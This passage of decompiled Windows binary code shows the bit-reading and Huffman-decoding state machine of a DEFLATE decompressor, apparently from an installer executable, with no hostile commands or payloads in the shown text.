                                                								}
                                                								L62:
                                                								if( *(__ebp - 0x34) == 0) {
                                                									goto L182;
                                                								}
                                                								L63:
                                                								__eax =  *(__ebp - 0x38);
                                                								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                								__ecx = __ebx;
                                                								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                								__ebx = __ebx + 8;
                                                							}
                                                							L65:
                                                							__ecx = __esi[2];
                                                							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                							__ebx = __ebx - 3;
                                                							_t108 = __ecx + 0x4084d4; // 0x121110
                                                							__ecx =  *_t108;
                                                							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                							__ecx = __esi[1];
                                                							__esi[2] = __esi[2] + 1;
                                                							__eax = __esi[2];
                                                							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                								goto L64;
                                                							}
                                                							L66:
                                                							while(1) {
                                                								L68:
                                                								if(__esi[2] >= 0x13) {
                                                									break;
                                                								}
                                                								L67:
                                                								_t119 = __esi[2] + 0x4084d4; // 0x4000300
                                                								__eax =  *_t119;
                                                								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                								_t126 =  &(__esi[2]);
                                                								 *_t126 = __esi[2] + 1;
                                                							}
                                                							L69:
                                                							__ecx = __ebp - 8;
                                                							__edi =  &(__esi[0x143]);
                                                							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                							__eax = 0;
                                                							 *(__ebp - 8) = 0;
                                                							__eax =  &(__esi[3]);
                                                							 *__edi = 7;
                                                							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                							if(__eax != 0) {
                                                								L72:
                                                								 *__esi = 0x11;
                                                								while(1) {
                                                									L180:
                                                									_t396 =  *_t446;
                                                									if(_t396 > 0xf) {
                                                										break;
                                                									}
                                                									L1:
                                                									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
                                                										case 0:
                                                											L101:
                                                											__eax = __esi[4] & 0x000000ff;
                                                											__esi[3] = __esi[4] & 0x000000ff;
                                                											__eax = __esi[5];
                                                											__esi[2] = __esi[5];
                                                											 *__esi = 1;
                                                											goto L102;
                                                										case 1:
                                                											L102:
                                                											__eax = __esi[3];
                                                											while(1) {
                                                												L105:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L103:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L104:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L106:
                                                											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                											__eax = __eax &  *(__ebp - 0x40);
                                                											__ecx = __esi[2];
                                                											__eax = __esi[2] + __eax * 4;
                                                											__ecx =  *(__eax + 1) & 0x000000ff;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                											__ecx =  *__eax & 0x000000ff;
                                                											__eflags = __ecx;
                                                											if(__ecx != 0) {
                                                												L108:
                                                												__eflags = __cl & 0x00000010;
                                                												if((__cl & 0x00000010) == 0) {
                                                													L110:
                                                													__eflags = __cl & 0x00000040;
                                                													if((__cl & 0x00000040) == 0) {
                                                														goto L125;
                                                													}
                                                													L111:
                                                													__eflags = __cl & 0x00000020;
                                                													if((__cl & 0x00000020) == 0) {
                                                														goto L9;
                                                													}
                                                													L112:
                                                													 *__esi = 7;
                                                													goto L180;
                                                												}
                                                												L109:
                                                												__esi[2] = __ecx;
                                                												__esi[1] = __eax;
                                                												 *__esi = 2;
                                                												goto L180;
                                                											}
                                                											L107:
                                                											__esi[2] = __eax;
                                                											 *__esi = 6;
                                                											goto L180;
                                                										case 2:
                                                											L113:
                                                											__eax = __esi[2];
                                                											while(1) {
                                                												L116:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L114:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L115:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L117:
                                                											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                											__ecx = __eax;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - __eax;
                                                											__eflags = __ebx;
                                                											__eax = __esi[4] & 0x000000ff;
                                                											__esi[3] = __esi[4] & 0x000000ff;
                                                											__eax = __esi[6];
                                                											__esi[2] = __esi[6];
                                                											 *__esi = 3;
                                                											goto L118;
                                                										case 3:
                                                											L118:
                                                											__eax = __esi[3];
                                                											while(1) {
                                                												L121:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L119:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L120:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L122:
                                                											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                											__eax = __eax &  *(__ebp - 0x40);
                                                											__ecx = __esi[2];
                                                											__eax = __esi[2] + __eax * 4;
                                                											__ecx =  *(__eax + 1) & 0x000000ff;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                											__ecx =  *__eax & 0x000000ff;
                                                											__eflags = __cl & 0x00000010;
                                                											if((__cl & 0x00000010) == 0) {
                                                												L124:
                                                												__eflags = __cl & 0x00000040;
                                                												if((__cl & 0x00000040) != 0) {
                                                													goto L9;
                                                												}
                                                												L125:
                                                												__esi[3] = __ecx;
                                                												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                												__esi[2] = __eax;
                                                												goto L180;
                                                											}
                                                											L123:
                                                											__esi[2] = __ecx;
                                                											__esi[3] = __eax;
                                                											 *__esi = 4;
                                                											goto L180;
                                                										case 4:
                                                											L126:
                                                											__eax = __esi[2];
                                                											while(1) {
                                                												L129:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L127:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L128:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L130:
                                                											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                											__ecx = __eax;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - __eax;
                                                											__eflags = __ebx;
                                                											 *__esi = 5;
                                                											goto L131;
                                                										case 5:
                                                											L131:
                                                											__eax =  *(__ebp - 0x30);
                                                											__edx = __esi[3];
                                                											__eax = __eax - __esi;
                                                											__ecx = __eax - __esi - 0x1ba0;
                                                											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                												__ecx = __eax;
                                                												__ecx = __eax - __edx;
                                                												__eflags = __ecx;
                                                											} else {
                                                												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                												__ecx = __esi[0x26e8] - __edx - __esi;
                                                												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                											}
                                                											__eflags = __esi[1];
                                                											 *(__ebp - 0x20) = __ecx;
                                                											if(__esi[1] != 0) {
                                                												L135:
                                                												__edi =  *(__ebp - 0x2c);
                                                												do {
                                                													L136:
                                                													__eflags = __edi;
                                                													if(__edi != 0) {
                                                														goto L152;
                                                													}
                                                													L137:
                                                													__edi = __esi[0x26e8];
                                                													__eflags = __eax - __edi;
                                                													if(__eax != __edi) {
                                                														L143:
                                                														__esi[0x26ea] = __eax;
                                                														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                														__eax = __esi[0x26ea];
                                                														__ecx = __esi[0x26e9];
                                                														__eflags = __eax - __ecx;
                                                														 *(__ebp - 0x30) = __eax;
                                                														if(__eax >= __ecx) {
                                                															__edi = __esi[0x26e8];
                                                															__edi = __esi[0x26e8] - __eax;
                                                															__eflags = __edi;
                                                														} else {
                                                															__ecx = __ecx - __eax;
                                                															__edi = __ecx - __eax - 1;
                                                														}
                                                														__edx = __esi[0x26e8];
                                                														__eflags = __eax - __edx;
                                                														 *(__ebp - 8) = __edx;
                                                														if(__eax == __edx) {
                                                															__edx =  &(__esi[0x6e8]);
                                                															__eflags = __ecx - __edx;
                                                															if(__ecx != __edx) {
                                                																__eax = __edx;
                                                																__eflags = __eax - __ecx;
                                                																 *(__ebp - 0x30) = __eax;
                                                																if(__eax >= __ecx) {
                                                																	__edi =  *(__ebp - 8);
                                                																	__edi =  *(__ebp - 8) - __eax;
                                                																	__eflags = __edi;
                                                																} else {
                                                																	__ecx = __ecx - __eax;
                                                																	__edi = __ecx;
                                                																}
                                                															}
                                                														}
                                                														__eflags = __edi;
                                                														if(__edi == 0) {
                                                															goto L183;
                                                														} else {
                                                															goto L152;
                                                														}
                                                													}
                                                													L138:
                                                													__ecx = __esi[0x26e9];
                                                													__edx =  &(__esi[0x6e8]);
                                                													__eflags = __ecx - __edx;
                                                													if(__ecx == __edx) {
                                                														goto L143;
                                                													}
                                                													L139:
                                                													__eax = __edx;
                                                													__eflags = __eax - __ecx;
                                                													if(__eax >= __ecx) {
                                                														__edi = __edi - __eax;
                                                														__eflags = __edi;
                                                													} else {
                                                														__ecx = __ecx - __eax;
                                                														__edi = __ecx;
                                                													}
                                                													__eflags = __edi;
                                                													if(__edi == 0) {
                                                														goto L143;
                                                													}
                                                													L152:
                                                													__ecx =  *(__ebp - 0x20);
                                                													 *__eax =  *__ecx;
                                                													__eax = __eax + 1;
                                                													__ecx = __ecx + 1;
                                                													__edi = __edi - 1;
                                                													__eflags = __ecx - __esi[0x26e8];
                                                													 *(__ebp - 0x30) = __eax;
                                                													 *(__ebp - 0x20) = __ecx;
                                                													 *(__ebp - 0x2c) = __edi;
                                                													if(__ecx == __esi[0x26e8]) {
                                                														__ecx =  &(__esi[0x6e8]);
                                                														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                													}
                                                													_t357 =  &(__esi[1]);
                                                													 *_t357 = __esi[1] - 1;
                                                													__eflags =  *_t357;
                                                												} while ( *_t357 != 0);
                                                											}
                                                											goto L23;
                                                										case 6:
                                                											L156:
                                                											__eax =  *(__ebp - 0x2c);
                                                											__edi =  *(__ebp - 0x30);
                                                											__eflags = __eax;
                                                											if(__eax != 0) {
                                                												L172:
                                                												__cl = __esi[2];
                                                												 *__edi = __cl;
                                                												__edi = __edi + 1;
                                                												__eax = __eax - 1;
                                                												 *(__ebp - 0x30) = __edi;
                                                												 *(__ebp - 0x2c) = __eax;
                                                												goto L23;
                                                											}
                                                											L157:
                                                											__ecx = __esi[0x26e8];
                                                											__eflags = __edi - __ecx;
                                                											if(__edi != __ecx) {
                                                												L163:
                                                												__esi[0x26ea] = __edi;
                                                												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                												__edi = __esi[0x26ea];
                                                												__ecx = __esi[0x26e9];
                                                												__eflags = __edi - __ecx;
                                                												 *(__ebp - 0x30) = __edi;
                                                												if(__edi >= __ecx) {
                                                													__eax = __esi[0x26e8];
                                                													__eax = __esi[0x26e8] - __edi;
                                                													__eflags = __eax;
                                                												} else {
                                                													__ecx = __ecx - __edi;
                                                													__eax = __ecx - __edi - 1;
                                                												}
                                                												__edx = __esi[0x26e8];
                                                												__eflags = __edi - __edx;
                                                												 *(__ebp - 8) = __edx;
                                                												if(__edi == __edx) {
                                                													__edx =  &(__esi[0x6e8]);
                                                													__eflags = __ecx - __edx;
                                                													if(__ecx != __edx) {
                                                														__edi = __edx;
                                                														__eflags = __edi - __ecx;
                                                														 *(__ebp - 0x30) = __edi;
                                                														if(__edi >= __ecx) {
                                                															__eax =  *(__ebp - 8);
                                                															__eax =  *(__ebp - 8) - __edi;
                                                															__eflags = __eax;
                                                														} else {
                                                															__ecx = __ecx - __edi;
                                                															__eax = __ecx;
                                                														}
                                                													}
                                                												}
                                                												__eflags = __eax;
                                                												if(__eax == 0) {
                                                													goto L183;
                                                												} else {
                                                													goto L172;
                                                												}
                                                											}
                                                											L158:
                                                											__eax = __esi[0x26e9];
                                                											__edx =  &(__esi[0x6e8]);
                                                											__eflags = __eax - __edx;
                                                											if(__eax == __edx) {
                                                												goto L163;
                                                											}
                                                											L159:
                                                											__edi = __edx;
                                                											__eflags = __edi - __eax;
                                                											if(__edi >= __eax) {
                                                												__ecx = __ecx - __edi;
                                                												__eflags = __ecx;
                                                												__eax = __ecx;
                                                											} else {
                                                												__eax = __eax - __edi;
                                                												__eax = __eax - 1;
                                                											}
                                                											__eflags = __eax;
                                                											if(__eax != 0) {
                                                												goto L172;
                                                											} else {
                                                												goto L163;
                                                											}
                                                										case 7:
                                                											L173:
                                                											__eflags = __ebx - 7;
                                                											if(__ebx > 7) {
                                                												__ebx = __ebx - 8;
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                												_t380 = __ebp - 0x38;
                                                												 *_t380 =  *(__ebp - 0x38) - 1;
                                                												__eflags =  *_t380;
                                                											}
                                                											goto L175;
                                                										case 8:
                                                											L4:
                                                											while(_t425 < 3) {
                                                												if( *(_t448 - 0x34) == 0) {
                                                													goto L182;
                                                												} else {
                                                													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                													_t425 = _t425 + 8;
                                                													continue;
                                                												}
                                                											}
                                                											_t425 = _t425 - 3;
                                                											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                											asm("sbb ecx, ecx");
                                                											_t408 = _t406 >> 1;
                                                											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                											if(_t408 == 0) {
                                                												L24:
                                                												 *_t446 = 9;
                                                												_t436 = _t425 & 0x00000007;
                                                												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                												_t425 = _t425 - _t436;
                                                												goto L180;
                                                											}
                                                											L6:
                                                											_t411 = _t408 - 1;
                                                											if(_t411 == 0) {
                                                												L13:
                                                												__eflags =  *0x432e90;
                                                												if( *0x432e90 != 0) {
                                                													L22:
                                                													_t412 =  *0x40a5e8; // 0x9
                                                													_t446[4] = _t412;
                                                													_t413 =  *0x40a5ec; // 0x5
                                                													_t446[4] = _t413;
                                                													_t414 =  *0x431d0c; // 0x0
                                                													_t446[5] = _t414;
                                                													_t415 =  *0x431d08; // 0x0
                                                													_t446[6] = _t415;
                                                													L23:
                                                													 *_t446 =  *_t446 & 0x00000000;
                                                													goto L180;
                                                												} else {
                                                													_t26 = _t448 - 8;
                                                													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                													__eflags =  *_t26;
                                                													_t416 = 0x431d10;
                                                													goto L15;
                                                													L20:
                                                													 *_t416 = _t438;
                                                													_t416 = _t416 + 4;
                                                													__eflags = _t416 - 0x432190;
                                                													if(_t416 < 0x432190) {
                                                														L15:
                                                														__eflags = _t416 - 0x431f4c;
                                                														_t438 = 8;
                                                														if(_t416 > 0x431f4c) {
                                                															__eflags = _t416 - 0x432110;
                                                															if(_t416 >= 0x432110) {
                                                																__eflags = _t416 - 0x432170;
                                                																if(_t416 < 0x432170) {
                                                																	_t438 = 7;
                                                																}
                                                															} else {
                                                																_t438 = 9;
                                                															}
                                                														}
                                                														goto L20;
                                                													} else {
                                                														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
                                                														_push(0x1e);
                                                														_pop(_t440);
                                                														_push(5);
                                                														_pop(_t419);
                                                														memset(0x431d10, _t419, _t440 << 2);
                                                														_t450 = _t450 + 0xc;
                                                														_t442 = 0x431d10 + _t440;
                                                														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
                                                														 *0x432e90 =  *0x432e90 + 1;
                                                														__eflags =  *0x432e90;
                                                														goto L22;
                                                													}
                                                												}
                                                											}
                                                											L7:
                                                											_t423 = _t411 - 1;
                                                											if(_t423 == 0) {
                                                												 *_t446 = 0xb;
                                                												goto L180;
                                                											}
                                                											L8:
                                                											if(_t423 != 1) {
                                                												goto L180;
                                                											}
                                                											goto L9;
                                                										case 9:
                                                											while(1) {
                                                												L27:
                                                												__eflags = __ebx - 0x20;
                                                												if(__ebx >= 0x20) {
                                                													break;
                                                												}
                                                												L25:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L26:
                                                												__eax =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__ecx = __ebx;
                                                												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L28:
                                                											__eax =  *(__ebp - 0x40);
                                                											__ebx = 0;
                                                											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                											 *(__ebp - 0x40) = 0;
                                                											__eflags = __eax;
                                                											__esi[1] = __eax;
                                                											if(__eax == 0) {
                                                												goto L53;
                                                											}
                                                											L29:
                                                											_push(0xa);
                                                											_pop(__eax);
                                                											goto L54;
                                                										case 0xa:
                                                											L30:
                                                											__eflags =  *(__ebp - 0x34);
                                                											if( *(__ebp - 0x34) == 0) {
                                                												goto L182;
                                                											}
                                                											L31:
                                                											__eax =  *(__ebp - 0x2c);
                                                											__eflags = __eax;
                                                											if(__eax != 0) {
                                                												L48:
                                                												__eflags = __eax -  *(__ebp - 0x34);
                                                												if(__eax >=  *(__ebp - 0x34)) {
                                                													__eax =  *(__ebp - 0x34);
                                                												}
                                                												__ecx = __esi[1];
                                                												__eflags = __ecx - __eax;
                                                												__edi = __ecx;
                                                												if(__ecx >= __eax) {
                                                													__edi = __eax;
                                                												}
                                                												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                												_t80 =  &(__esi[1]);
                                                												 *_t80 = __esi[1] - __edi;
                                                												__eflags =  *_t80;
                                                												if( *_t80 == 0) {
                                                													L53:
                                                													__eax = __esi[0x145];
                                                													L54:
                                                													 *__esi = __eax;
                                                												}
                                                												goto L180;
                                                											}
                                                											L32:
                                                											__ecx = __esi[0x26e8];
                                                											__edx =  *(__ebp - 0x30);
                                                											__eflags = __edx - __ecx;
                                                											if(__edx != __ecx) {
                                                												L38:
                                                												__esi[0x26ea] = __edx;
                                                												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                												__edx = __esi[0x26ea];
                                                												__ecx = __esi[0x26e9];
                                                												__eflags = __edx - __ecx;
                                                												 *(__ebp - 0x30) = __edx;
                                                												if(__edx >= __ecx) {
                                                													__eax = __esi[0x26e8];
                                                													__eax = __esi[0x26e8] - __edx;
                                                													__eflags = __eax;
                                                												} else {
                                                													__ecx = __ecx - __edx;
                                                													__eax = __ecx - __edx - 1;
                                                												}
                                                												__edi = __esi[0x26e8];
                                                												 *(__ebp - 0x2c) = __eax;
                                                												__eflags = __edx - __edi;
                                                												if(__edx == __edi) {
                                                													__edx =  &(__esi[0x6e8]);
                                                													__eflags = __edx - __ecx;
                                                													if(__eflags != 0) {
                                                														 *(__ebp - 0x30) = __edx;
                                                														if(__eflags >= 0) {
                                                															__edi = __edi - __edx;
                                                															__eflags = __edi;
                                                															__eax = __edi;
                                                														} else {
                                                															__ecx = __ecx - __edx;
                                                															__eax = __ecx;
                                                														}
                                                														 *(__ebp - 0x2c) = __eax;
                                                													}
                                                												}
                                                												__eflags = __eax;
                                                												if(__eax == 0) {
                                                													goto L183;
                                                												} else {
                                                													goto L48;
                                                												}
                                                											}
                                                											L33:
                                                											__eax = __esi[0x26e9];
                                                											__edi =  &(__esi[0x6e8]);
                                                											__eflags = __eax - __edi;
                                                											if(__eax == __edi) {
                                                												goto L38;
                                                											}
                                                											L34:
                                                											__edx = __edi;
                                                											__eflags = __edx - __eax;
                                                											 *(__ebp - 0x30) = __edx;
                                                											if(__edx >= __eax) {
                                                												__ecx = __ecx - __edx;
                                                												__eflags = __ecx;
                                                												__eax = __ecx;
                                                											} else {
                                                												__eax = __eax - __edx;
                                                												__eax = __eax - 1;
                                                											}
                                                											__eflags = __eax;
                                                											 *(__ebp - 0x2c) = __eax;
                                                											if(__eax != 0) {
                                                												goto L48;
                                                											} else {
                                                												goto L38;
                                                											}
                                                										case 0xb:
                                                											goto L56;
                                                										case 0xc:
                                                											L60:
                                                											__esi[1] = __esi[1] >> 0xa;
                                                											__eax = (__esi[1] >> 0xa) + 4;
                                                											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                												goto L68;
                                                											}
                                                											goto L61;
                                                										case 0xd:
                                                											while(1) {
                                                												L93:
                                                												__eax = __esi[1];
                                                												__ecx = __esi[2];
                                                												__edx = __eax;
                                                												__eax = __eax & 0x0000001f;
                                                												__edx = __edx >> 5;
                                                												__eax = __edx + __eax + 0x102;
                                                												__eflags = __esi[2] - __eax;
                                                												if(__esi[2] >= __eax) {
                                                													break;
                                                												}
                                                												L73:
                                                												__eax = __esi[0x143];
                                                												while(1) {
                                                													L76:
                                                													__eflags = __ebx - __eax;
                                                													if(__ebx >= __eax) {
                                                														break;
                                                													}
                                                													L74:
                                                													__eflags =  *(__ebp - 0x34);
                                                													if( *(__ebp - 0x34) == 0) {
                                                														goto L182;
                                                													}
                                                													L75:
                                                													__ecx =  *(__ebp - 0x38);
                                                													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                													__ecx = __ebx;
                                                													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                													__ebx = __ebx + 8;
                                                													__eflags = __ebx;
                                                												}
                                                												L77:
                                                												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                												__eax = __eax &  *(__ebp - 0x40);
                                                												__ecx = __esi[0x144];
                                                												__eax = __esi[0x144] + __eax * 4;
                                                												__edx =  *(__eax + 1) & 0x000000ff;
                                                												__eax =  *(__eax + 2) & 0x0000ffff;
                                                												__eflags = __eax - 0x10;
                                                												 *(__ebp - 0x14) = __eax;
                                                												if(__eax >= 0x10) {
                                                													L79:
                                                													__eflags = __eax - 0x12;
                                                													if(__eax != 0x12) {
                                                														__eax = __eax + 0xfffffff2;
                                                														 *(__ebp - 8) = 3;
                                                													} else {
                                                														_push(7);
                                                														 *(__ebp - 8) = 0xb;
                                                														_pop(__eax);
                                                													}
                                                													while(1) {
                                                														L84:
                                                														__ecx = __eax + __edx;
                                                														__eflags = __ebx - __eax + __edx;
                                                														if(__ebx >= __eax + __edx) {
                                                															break;
                                                														}
                                                														L82:
                                                														__eflags =  *(__ebp - 0x34);
                                                														if( *(__ebp - 0x34) == 0) {
                                                															goto L182;
                                                														}
                                                														L83:
                                                														__ecx =  *(__ebp - 0x38);
                                                														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                														__ecx = __ebx;
                                                														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                														__ebx = __ebx + 8;
                                                														__eflags = __ebx;
                                                													}
                                                													L85:
                                                													__ecx = __edx;
                                                													__ebx = __ebx - __edx;
                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                													__edx =  *(__ebp - 8);
                                                													__ebx = __ebx - __eax;
                                                													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                													__ecx = __eax;
                                                													__eax = __esi[1];
                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                													__ecx = __esi[2];
                                                													__eax = __eax >> 5;
                                                													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                													__eax = __eax & 0x0000001f;
                                                													__eax = __edi + __eax + 0x102;
                                                													__edi = __edx + __ecx;
                                                													__eflags = __edx + __ecx - __eax;
                                                													if(__edx + __ecx > __eax) {
                                                														goto L9;
                                                													}
                                                													L86:
                                                													__eflags =  *(__ebp - 0x14) - 0x10;
                                                													if( *(__ebp - 0x14) != 0x10) {
                                                														L89:
                                                														__edi = 0;
                                                														__eflags = 0;
                                                														L90:
                                                														__eax = __esi + 0xc + __ecx * 4;
                                                														do {
                                                															L91:
                                                															 *__eax = __edi;
                                                															__ecx = __ecx + 1;
                                                															__eax = __eax + 4;
                                                															__edx = __edx - 1;
                                                															__eflags = __edx;
                                                														} while (__edx != 0);
                                                														__esi[2] = __ecx;
                                                														continue;
                                                													}
                                                													L87:
                                                													__eflags = __ecx - 1;
                                                													if(__ecx < 1) {
                                                														goto L9;
                                                													}
                                                													L88:
                                                													__edi =  *(__esi + 8 + __ecx * 4);
                                                													goto L90;
                                                												}
                                                												L78:
                                                												__ecx = __edx;
                                                												__ebx = __ebx - __edx;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                												__ecx = __esi[2];
